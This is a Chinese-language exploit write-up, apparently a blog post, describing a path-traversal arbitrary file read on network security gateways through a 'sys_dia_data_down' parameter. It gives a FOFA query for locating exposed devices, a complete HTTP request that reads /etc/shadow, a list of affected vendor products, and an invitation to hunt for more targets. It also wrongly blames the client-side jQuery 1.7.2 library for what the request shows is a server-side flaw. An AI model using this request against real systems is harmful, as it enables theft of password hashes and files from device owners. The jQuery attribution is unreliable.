jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库,其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件。
高危
fofa
body="webui/js/jquerylib/jquery-1.7.2.min.js"
jQuery-1.7.2
我们以使用该插件的安博通网关为例:
构造
GET /webui/?file_name=../../../../../etc/shadow&g=sys_dia_data_down HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: USGSESSID=ddc4875e875c49403c35ccfbcef07db1
Upgrade-Insecure-Requests: 1
返回内容即为文件内容:
不难看出file_name就是控制文件路径的参数,我们可以简单的得出访问任意文件的构造访问
file_name=../../../../../etc/shadow. =/etc/shadow
file_name=../../../../../bin/bash =/bin/bash
漏洞相对比较简单。
因为jquery是个非常常用的插件,所以很多饮用该版本的系统都会存在漏洞,大量的网关系统就因此中招了,已知的就有这些。
如:
飞鱼星下一代防火墙安全网关;/任天行网络安全管理系统;等等很多很多。有兴趣大家可以自己找找看。
后续还会随文章附赠一个简单的利用脚本,如果有问题欢迎随时沟通~